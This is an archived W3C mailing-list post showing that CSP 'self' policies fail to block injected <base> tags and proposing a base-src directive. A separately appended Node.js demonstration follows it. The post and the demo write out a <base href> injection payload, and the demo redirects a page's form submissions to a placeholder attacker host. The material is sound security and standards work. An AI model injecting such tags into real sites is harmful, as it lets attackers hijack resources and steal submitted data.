
CSP and <base> Tag Injection + Suggestion for New CSP Directive "base-src" in CSP 1.1

From: Ashar Javed <justashar@gmail.com>
Date: Mon, 15 Oct 2012 18:32:26 +0200
Message-ID: <CAD5mSqWRg665Ng5HRS07PkRAeNUCe_zTe3z5hpbVq7UL5mPc4A@mail.gmail.com>
To: public-webappsec@w3.org
Cc: Adam Barth <abarth@webkit.org>

Hi,

Even if a site is using a 'self' CSP policy for all types of resources, an
attacker can still inject a *<base>* tag and CSP cannot stop it, e.g.,

On testing environment:
http://www.mobilefuxx.de/csp/xsstest/test_unsafe.php, you may set the
following CSP header as an example:

default-src 'self';

and in the allowed injection area, inject:

<BASE HREF="http://www.google.com/logos/">
<img src="classicplus.png">

Now click the "*Submit Attack*" button ... nothing happens, but behind the scenes
Chrome has changed the base URL. You can see the new URL by clicking
the "*Submit Attack*" button again; the URL you now have is:

http://www.google.com/csp/xsstest/test_unsafe.php

I think, or rather I would like to suggest, that CSP 1.1 should also have a
*base-src 'self' directive* in order to stop base tag injection. At the same time I
would also like to point out a few posts related to the base tag and how an attacker
can use it to exfiltrate information. Thanks!

http://lcamtuf.coredump.cx/postxss/
http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/
http://avuko.net/

Reference Bug: https://bugs.webkit.org/show_bug.cgi?id=99318

Thanks!

Best Regards,

ashar
Received on Monday, 15 October 2012 16:35:03 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Monday, 15 October 2012 16:35:04 GMT
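As an added example (not part of the original post or of any browser's code), the following Node.js snippet shows how relative resource URLs and form actions resolve once an injected <base href> is present, and checks whether a policy string carries a directive that restricts <base>; the document URL and the attacker host are constructed placeholders, and base-uri is the name CSP Level 2 later adopted for the directive the post proposes as base-src.

```javascript
// Constructed example: demonstrates why default-src 'self' does not stop
// <base> injection, and what a policy must contain to constrain it.

// Resolve each relative src/href/action in a fragment the way a browser would,
// taking the first <base href> in the document (if any) as the base URL.
function resolveResources(html, documentUrl) {
  const baseMatch = html.match(/<base\s+[^>]*href=["']([^"']+)["']/i);
  const base = baseMatch ? new URL(baseMatch[1], documentUrl).href : documentUrl;
  const resources = [];
  const attrRe = /<(img|script|link|a|form)\s+[^>]*(?:src|href|action)=["']([^"']+)["']/gi;
  let m;
  while ((m = attrRe.exec(html)) !== null) {
    resources.push({ tag: m[1].toLowerCase(), resolved: new URL(m[2], base).href });
  }
  return { base, resources };
}

// Parse a Content-Security-Policy header value into a directive map
// (first occurrence of a directive name wins, as in the CSP spec).
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

// default-src does not govern <base>; only an explicit base directive does.
// base-src is the name proposed in the post, base-uri the one CSP 2 shipped.
function restrictsBase(policy) {
  const d = parseCsp(policy);
  return d.has('base-uri') || d.has('base-src');
}

// Constructed injection mirroring the post: a <base> tag, a relative <img>,
// and the page's own form whose action is an absolute path on the site.
const DOCUMENT_URL = 'http://site.example/csp/xsstest/test_unsafe.php';
const INJECTED_HTML =
  '<BASE HREF="http://attacker.example/logos/">\n' +
  '<img src="classicplus.png">\n' +
  '<form action="/csp/xsstest/test_unsafe.php"></form>';

const result = resolveResources(INJECTED_HTML, DOCUMENT_URL);
for (const r of result.resources) console.log(r.tag, '->', r.resolved);
console.log("default-src 'self' restricts <base>:", restrictsBase("default-src 'self';"));
```

Both the image and the form submission now resolve against the attacker-controlled host, which is the exfiltration path the post's references describe; only a base-restricting directive changes that outcome.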